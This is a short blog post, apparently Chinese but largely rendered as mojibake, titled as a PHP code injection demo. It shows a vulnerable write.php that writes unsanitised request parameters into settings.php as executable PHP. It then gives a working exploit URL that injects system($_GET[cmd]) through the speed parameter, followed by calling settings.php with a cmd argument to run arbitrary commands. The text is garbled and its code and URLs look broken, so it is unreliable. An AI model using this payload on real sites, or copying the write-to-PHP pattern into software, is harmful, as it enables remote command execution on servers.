PHP code injection demo

2023 年 6 月 14 日2560

secure-hiphop鐨凚log

娴嬭瘯 write.php

<?php
$filename = settings.php;
if (is_writable($filename)) {
if (!$handle = fopen($filename, w)) {
print "Cannot open file ($filename)";
exit;
}
if (!fwrite($handle, "<?php
$password = $password;
$font = $font;
$height = $height;
$width = $width;
$direction = $direction;
$speed = $speed;
$bgcolor = $bgcolor;
$txtcolor = $txtcolor;
$txtsize = $txtsize;
?>")) {
print "Cannot write to file ($filename)";
exit;
}
print "Successfully saved settings to file ($filename)";
fclose($handle);
} else {
print "The file $filename is not writable";
}
?>
<br><br><br><br><br><br><div align=center>

鍒╃敤锛
鍦ㄦ湰鍦板厛寤虹珛涓涓猻ettings.php
[url]http://http://www.zjjv.com///write.php?speed=;%20system($_GET[cmd]);


http://localhost/settings.php?cmd = [鍛戒护]

0 0